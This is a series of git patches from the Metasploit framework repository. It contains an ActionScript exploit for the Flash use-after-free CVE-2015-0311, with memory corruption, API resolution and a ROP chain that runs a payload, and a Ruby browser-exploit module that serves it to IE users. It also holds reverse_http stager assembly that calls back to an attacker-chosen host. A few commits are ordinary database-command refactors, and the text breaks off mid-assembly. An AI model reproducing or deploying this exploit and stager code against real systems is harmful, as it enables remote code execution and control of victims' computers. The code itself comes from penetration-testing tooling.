05ca4000 ffffffff 05042000 05ca4000 00000000 + 05ca4010 00000000 00000000 00000000 00000000 + 05ca4020 00000000 00000000 00000000 00000000 + 05ca4030 00000000 00000000 00000000 00000000 + 05ca4040 00000000 00000000 00000000 00000000 + 05ca4050 00000000 00000000 00000000 00000000 + 05ca4060 00000000 00000000 00000000 00000000 + 05ca4070 00000000 00000000 00000000 00000000 + */ + uv[0][0] = uv[0][0x2000003] - 0x18 - 0x2000000 * 4 + //log("uv[0][0]: " + uv[0][0].toString(16)); + + ba.endian = "littleEndian" + ba.length = 0x500000 + var buffer:uint = vector_read(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8) + 0x100000 + //log("buffer: " + buffer.toString(16)); + + var main:uint = uv[0][0x2000009] - 1 + //log("main: " + main.toString(16)); + + var vtable:uint = vector_read(main) + //log("vtable: " + vtable.toString(16)); + + vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8) + vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 16, 0xffffffff) + byte_write(uv[0][0]) + + var flash:uint = base(vtable) + //log("flash: " + flash.toString(16)); + + // Because of the sandbox, when you try to solve kernel32 + // from the flash imports on IE, it will solve ieshims.dll + var ieshims:uint = module("kernel32.dll", flash) + //log("ieshims: " + ieshims.toString(16)); + + var kernel32:uint = module("kernel32.dll", ieshims) + //log("kernel32: " + kernel32.toString(16)); + + var ntdll:uint = module("ntdll.dll", kernel32) + //log("ntdll: " + ntdll.toString(16)); + + var urlmon:uint = module("urlmon.dll", flash) + //log("urlmon: " + urlmon.toString(16)); + + var virtualprotect:uint = procedure("VirtualProtect", kernel32) + //log("virtualprotect: " + virtualprotect.toString(16)); + + var winexec:uint = procedure("WinExec", kernel32) + //log("winexec: " + winexec.toString(16)); + + var urldownloadtofile:uint = procedure("URLDownloadToFileA", urlmon); + //log("urldownloadtofile: " + urldownloadtofile.toString(16)); + + var getenvironmentvariable:uint = procedure("GetEnvironmentVariableA", kernel32) + //log("getenvironmentvariable: " + getenvironmentvariable.toString(16)); + + var setcurrentdirectory:uint = procedure("SetCurrentDirectoryA", kernel32) + //log("setcurrentdirectory: " + setcurrentdirectory.toString(16)); + + var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) + //log("xchgeaxespret: " + xchgeaxespret.toString(16)); + + var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) + //log("xchgeaxesiret: " + xchgeaxesiret.toString(16)); + + // CoE + byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable + byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main + byte_write(0, "\x89\x03", false) // mov [ebx], eax + byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + + byte_write(buffer+0x200, payload); + byte_write(buffer + 0x20070, xchgeaxespret) + byte_write(buffer + 0x20000, xchgeaxesiret) + byte_write(0, virtualprotect) + + // VirtualProtect + byte_write(0, winexec) + byte_write(0, buffer + 0x30000) + byte_write(0, 0x1000) + byte_write(0, 0x40) + byte_write(0, buffer + 0x100) + + // WinExec + byte_write(0, buffer + 0x30000) + byte_write(0, buffer + 0x200) + byte_write(0) + + byte_write(main, buffer + 0x20000) + toString() + } + + private function vector_write(addr:uint, value:uint = 0):void + { + addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] = value : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1] = value + } + + private function vector_read(addr:uint):uint + { + return addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1] + } + + private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void + { + if (addr) ba.position = addr + if (value is String) { + for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) + if (zero) ba.writeByte(0) + } else ba.writeUnsignedInt(value) + } + + private function byte_read(addr:uint, type:String = "dword"):uint + { + ba.position = addr + switch(type) { + case "dword": + return ba.readUnsignedInt() + case "word": + return ba.readUnsignedShort() + case "byte": + return ba.readUnsignedByte() + } + return 0 + } + + private function base(addr:uint):uint + { + addr &= 0xffff0000 + while (true) { + if (byte_read(addr) == 0x00905a4d) return addr + addr -= 0x10000 + } + return 0 + } + + private function module(name:String, addr:uint):uint + { + var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) + var i:int = -1 + while (true) { + var entry:uint = byte_read(iat + (++i) * 0x14 + 12) + if (!entry) throw new Error("FAIL!"); + ba.position = addr + entry + var dll_name:String = ba.readUTFBytes(name.length).toUpperCase(); + if (dll_name == name.toUpperCase()) { + break; + } + } + return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))); + } + + private function procedure(name:String, addr:uint):uint + { + var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) + var numberOfNames:uint = byte_read(eat + 0x18) + var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) + var addressOfNames:uint = addr + byte_read(eat + 0x20) + var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) + + for (var i:uint = 0; ; i++) { + var entry:uint = byte_read(addressOfNames + i * 4) + ba.position = addr + entry + if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break + } + return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) + } + + private function gadget(gadget:String, hint:uint, addr:uint):uint + { + var find:uint = 0 + var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) + var value:uint = parseInt(gadget, 16) + for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break + return addr + i + } + } +} + diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb new file mode 100644 index 0000000000..4f6accf4b2 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free', + 'Description' => %q{ + This module exploits an use after free vulnerability in Adobe Flash Player. The + vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying + to uncompress() a malformed byte stream. This module has been tested successfully + on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and + 16.0.0.235. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'hdarwin', # Public exploit by @hdarwin89 + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0311'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], + ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], + ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0311", "msf.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 78167c3bb80f0afc2915a02e1745d7eaa14cb703 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Mar 2015 16:55:21 -0500 Subject: [PATCH 03/18] Use single quotes when possible --- .../windows/browser/adobe_flash_uncompress_zlib_uaf.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb index 4f6accf4b2..5f7996a7eb 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote ['CVE', '2015-0311'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], - ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ] + ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/'] ], 'Payload' => { @@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ - print_status("Sending SWF...") + print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end - print_status("Sending HTML...") + print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote end def create_swf - path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0311", "msf.swf" ) + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf From 14c3848493508eeb02dcd0af347301f0641ee151 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Mar 2015 16:59:10 -0500 Subject: [PATCH 04/18] Delete useless comment --- external/source/exploits/CVE-2015-0311/Main.as | 1 - 1 file changed, 1 deletion(-) diff --git a/external/source/exploits/CVE-2015-0311/Main.as b/external/source/exploits/CVE-2015-0311/Main.as index 34b97b9ac6..9393a0495a 100755 --- a/external/source/exploits/CVE-2015-0311/Main.as +++ b/external/source/exploits/CVE-2015-0311/Main.as @@ -61,7 +61,6 @@ package /* 0:008> dd 5ca4000 - length vtable? data 05ca4000 ffffffff 05042000 05ca4000 00000000 05ca4010 00000000 00000000 00000000 00000000 05ca4020 00000000 00000000 00000000 00000000 From 187a0445f32328d25780f4ae9607b246ad473dbb Mon Sep 17 00:00:00 2001 From: nstarke Date: Tue, 10 Mar 2015 00:02:34 +0000 Subject: [PATCH 05/18] Issue #4868 - Adding warning message to db_connect when already connected --- lib/msf/ui/console/command_dispatcher/db.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 0f2453ca17..982ce1bdf9 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1706,6 +1706,15 @@ class Db def cmd_db_connect(*args) return if not db_check_driver + if framework.db.connection_established? + cdb = "" + ::ActiveRecord::Base.connection_pool.with_connection { |conn| + if conn.respond_to? :current_database + cdb = conn.current_database + end + } + return print_status("#{framework.db.driver} already connected to #{cdb}") + end if (args[0] == "-y") if (args[1] and not ::File.exists? ::File.expand_path(args[1])) print_error("File not found") From ee8318d5c49e1f4cc930d5ec031a87732b74474f Mon Sep 17 00:00:00 2001 From: nstarke Date: Tue, 10 Mar 2015 11:58:04 +0000 Subject: [PATCH 06/18] Adding db_disconnect qualifying statement --- lib/msf/ui/console/command_dispatcher/db.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 982ce1bdf9..25016d904c 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1713,7 +1713,9 @@ class Db cdb = conn.current_database end } - return print_status("#{framework.db.driver} already connected to #{cdb}") + status = "#{framework.db.driver} already connected to #{cdb}. " + status += "Run db_disconnect first if you wish to connect to a different database." + return print_status(status) end if (args[0] == "-y") if (args[1] and not ::File.exists? ::File.expand_path(args[1])) From e81f2e366c8d757ec0780f74dc1874b517f81baa Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 10 Mar 2015 12:35:58 -0500 Subject: [PATCH 07/18] Refactor db_{status,connect} a bit Also allow for db_connect help. --- lib/msf/ui/console/command_dispatcher/db.rb | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 25016d904c..0ba92f5c4c 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1688,11 +1688,11 @@ class Db if framework.db.connection_established? cdb = "" - ::ActiveRecord::Base.connection_pool.with_connection { |conn| - if conn.respond_to? :current_database + ::ActiveRecord::Base.connection_pool.with_connection do |conn| + if conn.respond_to?(:current_database) cdb = conn.current_database end - } + end print_status("#{framework.db.driver} connected to #{cdb}") else print_status("#{framework.db.driver} selected, no connection") @@ -1706,16 +1706,16 @@ class Db def cmd_db_connect(*args) return if not db_check_driver - if framework.db.connection_established? + if args[0] != '-h' && framework.db.connection_established? cdb = "" - ::ActiveRecord::Base.connection_pool.with_connection { |conn| - if conn.respond_to? :current_database + ::ActiveRecord::Base.connection_pool.with_connection do |conn| + if conn.respond_to?(:current_database) cdb = conn.current_database end - } - status = "#{framework.db.driver} already connected to #{cdb}. " - status += "Run db_disconnect first if you wish to connect to a different database." - return print_status(status) + end + print_status("#{framework.db.driver} already connected to #{cdb}. " + + "Run db_disconnect first if you wish to connect to a different database.") + return end if (args[0] == "-y") if (args[1] and not ::File.exists? ::File.expand_path(args[1])) From 966848127a94488213a8f0bcf974888de52f4441 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Tue, 10 Mar 2015 12:48:30 -0500 Subject: [PATCH 08/18] Refactor x86 Windows reverse_http and reverse_https stagers --- .../core/handler/reverse_http/uri_checksum.rb | 34 +- lib/msf/core/payload/windows.rb | 7 + lib/msf/core/payload/windows/block_api.rb | 112 ++++++ lib/msf/core/payload/windows/exitfunk.rb | 79 ++++ lib/msf/core/payload/windows/reverse_http.rb | 339 ++++++++++++++++++ lib/msf/core/payload/windows/reverse_https.rb | 63 ++++ .../payloads/stagers/windows/reverse_http.rb | 69 +--- .../payloads/stagers/windows/reverse_https.rb | 63 +--- .../stagers/windows/x64/reverse_https.rb | 2 +- .../handler/reverse_http/uri_checksum_spec.rb | 13 + 10 files changed, 655 insertions(+), 126 deletions(-) create mode 100644 lib/msf/core/payload/windows/block_api.rb create mode 100644 lib/msf/core/payload/windows/exitfunk.rb create mode 100644 lib/msf/core/payload/windows/reverse_http.rb create mode 100644 lib/msf/core/payload/windows/reverse_https.rb diff --git a/lib/msf/core/handler/reverse_http/uri_checksum.rb b/lib/msf/core/handler/reverse_http/uri_checksum.rb index 96e76baec3..fca2a371b6 100644 --- a/lib/msf/core/handler/reverse_http/uri_checksum.rb +++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb @@ -76,8 +76,11 @@ module Msf # Create a URI that matches a given checksum # # @param sum [Fixnum] The checksum value you are trying to create a URI for + # @param len [Fixnum] An optional length value for the created URI # @return [String] The URI string that checksums to the given value - def generate_uri_checksum(sum) + def generate_uri_checksum(sum,len=nil) + return generate_uri_checksum_with_length(sum, len) if len + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a 32.times do uri = Rex::Text.rand_text_alphanumeric(3) @@ -90,6 +93,35 @@ module Msf return URI_CHECKSUM_PRECALC[sum] end + # Create an arbitrary length URI that matches a given checksum + # + # @param sum [Fixnum] The checksum value you are trying to create a URI for + # @param len [Fixnum] The length of the created URI + # @return [String] The URI string that checksums to the given value + def generate_uri_checksum_with_length(sum, len) + # Lengths shorter than 4 bytes are unable to match all possible checksums + # Lengths of exactly 4 are relatively slow to find for high checksum values + # Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms) + raise ArgumentError, "Length must be 5 bytes or greater" if len < 5 + + # Funny enough, this was more efficient than calculating checksum offsets + if len < 40 + loop do + uri = Rex::Text.rand_text_alphanumeric(len) + return uri if Rex::Text.checksum8(uri) == sum + end + end + + # The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes + # Calculating a static prefix flattens out the average runtime for longer URIs + prefix = Rex::Text.rand_text_alphanumeric(len-20) + + loop do + uri = prefix + Rex::Text.rand_text_alphanumeric(20) + return uri if Rex::Text.checksum8(uri) == sum + end + end + end end end diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 26856d4444..a6fcf932fa 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -150,5 +150,12 @@ module Msf::Payload::Windows return true end + # + # Share the EXITFUNC mappings with other classes + # + def self.exit_types + @@exit_types.dup + end + end diff --git a/lib/msf/core/payload/windows/block_api.rb b/lib/msf/core/payload/windows/block_api.rb new file mode 100644 index 0000000000..c1fbbf5da1 --- /dev/null +++ b/lib/msf/core/payload/windows/block_api.rb @@ -0,0 +1,112 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf + + +### +# +# Basic block_api stubs for Windows ARCH_X86 payloads +# +### + + +module Payload::Windows::BlockApi + + def asm_block_api(opts={}) + + raw = %q^ + + api_call: + pushad ; We preserve all the registers for the caller, bar EAX and ECX. + mov ebp, esp ; Create a new stack frame + xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found) + mov edx, [fs:eax+48] ; Get a pointer to the PEB + mov edx, [edx+12] ; Get PEB->Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list + next_mod: ; + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name + loop_modname: ; + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase + not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop untill we have read enough + + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to iterate the export address table + mov edx, [edx+16] ; Get this modules base address + mov ecx, [edx+60] ; Get PE header + + ; use ecx as our EAT pointer here so we can take advantage of jecxz. + mov ecx, [ecx+edx+120] ; Get the EAT from the PE header + jecxz get_next_mod1 ; If no EAT present, process the next module + add ecx, edx ; Add the modules base address + push ecx ; Save the current modules EAT + mov ebx, [ecx+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + mov ecx, [ecx+24] ; Get the number of function names + ; now ecx returns to its regularly scheduled counter duties + + ; Computing the module hash + function hash + get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want + loop_funcname: ; + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... + finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... + + get_next_mod: ; + pop edi ; Pop off the current (now the previous) modules EAT + get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp.i8 next_mod ; Process this module + ^ + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/exitfunk.rb b/lib/msf/core/payload/windows/exitfunk.rb new file mode 100644 index 0000000000..3d6e61935c --- /dev/null +++ b/lib/msf/core/payload/windows/exitfunk.rb @@ -0,0 +1,79 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows' +module Msf + + +### +# +# Implements arbitrary exit routines for Windows ARCH_X86 payloads +# +### + +module Payload::Windows::Exitfunk + + def asm_exitfunk(opts={}) + + asm = "exitfunk:\n" + + case opts[:exitfunk] + + when 'seh' + asm << %Q^ + mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']} + push.i8 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; SetUnhandledExceptionFilter(0) + push.i8 0 + ret ; Return to NULL (crash) + ^ + + # On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread + # on WoW64 processes, instead we need to call RtlExitUserThread. This stub will + # automatically generate the right code depending on the selected exit method. + + when 'thread' + asm << %Q^ + mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']} + push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" ) + call ebp ; GetVersion(); (AL will = major version and AH will = minor version) + cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7 + jl exitfunk_goodbye ; Then just call the exit function... + cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7... + jne exitfunk_goodbye ; + mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread + exitfunk_goodbye: ; We now perform the actual call to the exit function + push.i8 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; call ExitThread(0) || RtlExitUserThread(0) + ^ + + when 'process', nil + asm << %Q^ + mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']} + push.i8 0 ; push the exit function parameter + push ebx ; push the hash of the exit function + call ebp ; ExitProcess(0) + ^ + + when 'sleep' + asm << %Q^ + mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')} + push 300000 ; 300 seconds + push ebx ; push the hash of the function + call ebp ; Sleep(300000) + jmp exitfunk ; repeat + ^ + else + # Do nothing and continue after the end of the shellcode + end + + asm + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb new file mode 100644 index 0000000000..c6bb96b3c4 --- /dev/null +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -0,0 +1,339 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/block_api' +require 'msf/core/payload/windows/exitfunk' + +module Msf + + +### +# +# Complex payload generation for Windows ARCH_X86 that speak HTTP(S) +# +### + + +module Payload::Windows::ReverseHttp + + include Msf::Payload::Windows::BlockApi + include Msf::Payload::Windows::Exitfunk + + # + # Register reverse_http specific options + # + def initialize(*args) + super + register_advanced_options( + [ + OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (5 to 240ish bytes)']) + ], self.class) + end + + # + # Generate the first stage + # + def generate + # Generate the simple version of this stager if we don't have enough space + if self.available_space.nil? || required_space > self.available_space + return generate_reverse_http( + ssl: false, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW)) + end + + conf = { + ssl: false, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: generate_uri, + exitfunk: datastore['EXITFUNC'] + } + + generate_reverse_http(conf) + end + + # + # Generate and compile the stager + # + def generate_reverse_http(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. + #{asm_block_api} + start: + pop ebp + #{asm_reverse_http(opts)} + ^ + Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string + end + + # + # Generate the URI for the initial stager + # + def generate_uri + # Maximum URL is limited to https:// plus 256 bytes, figure out our maximum URI + uri_max_len = 256 - "#{datastore['LHOST']}:#{datastore['LPORT']}/".length + uri_req_len = datastore['HTTPStagerURILength'].to_i + + if uri_req_len > 0 + + if uri_req_len > uri_max_len + raise ArgumentError, "Maximum HTTPStagerURILength is #{uri_max_len}" + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum HTTPStagerURILength is 5" + end + + return "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, uri_req_len) + end + + # Generate a random 30+ byte URI + "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW, 30 + rand(uri_max_len-30)) + end + + # + # Determine the maximum amount of space required for the features requested + # + def required_space + # Start with our cached default generated size + space = cached_size + + # Add 100 bytes for the encoder to have some room + space += 100 + + # Add 251 bytes for large URI support (technically a little less, but lets go with it) + space += 251 + + # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others) + space += 31 + + # The final estimated size + space + end + + # + # Dynamic payload generation + # + def asm_reverse_http(opts={}) + + # + # options should contain: + # ssl: (true|false) + # url: "/url_to_request" + # host: [hostname] + # port: [port] + # exitfunk: [process|thread|seh|sleep] + # + + http_open_flags = 0 + + if opts[:ssl] + #;0x80000000 | ; INTERNET_FLAG_RELOAD + #;0x04000000 | ; INTERNET_NO_CACHE_WRITE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION + #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + #;0x00000200 | ; INTERNET_FLAG_NO_UI + #;0x00800000 | ; INTERNET_FLAG_SECURE + #;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID + #;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID + http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000 ) + else + #;0x80000000 | ; INTERNET_FLAG_RELOAD + #;0x04000000 | ; INTERNET_NO_CACHE_WRITE + #;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION + #;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT + #;0x00000200 ; INTERNET_FLAG_NO_UI + http_open_flags = ( 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 ) + end + + asm = %Q^ + ;-----------------------------------------------------------------------------; + ; Author: HD Moore + ; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000 + ; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1) + ; Version: 1.0 + ;-----------------------------------------------------------------------------; + + ; Input: EBP must be the address of 'api_call'. + ; Output: EDI will be the socket for the connection to the server + ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) + load_wininet: + push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. + push 0x696e6977 ; ... + push esp ; Push a pointer to the "wininet" string on the stack. + push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) + call ebp ; LoadLibraryA( "wininet" ) + + set_retry: + push.i8 8 ; retry 8 times should be enough + pop edi + xor ebx, ebx ; push 8 zeros ([1]-[8]) + mov ecx, edi + push_zeros: + push ebx + loop push_zeros + + internetopen: + ; DWORD dwFlags [1] + ; LPCTSTR lpszProxyBypass (NULL) [2] + ; LPCTSTR lpszProxyName (NULL) [3] + ; DWORD dwAccessType (PRECONFIG = 0) [4] + ; LPCTSTR lpszAgent (NULL) [5] + push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) + call ebp + + internetconnect: + ; DWORD_PTR dwContext (NULL) [6] + ; dwFlags [7] + push.i8 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) + push ebx ; password (NULL) + push ebx ; username (NULL) + push #{opts[:port]} ; PORT + call got_server_uri ; double call to get pointer for both server_uri and + server_uri: ; 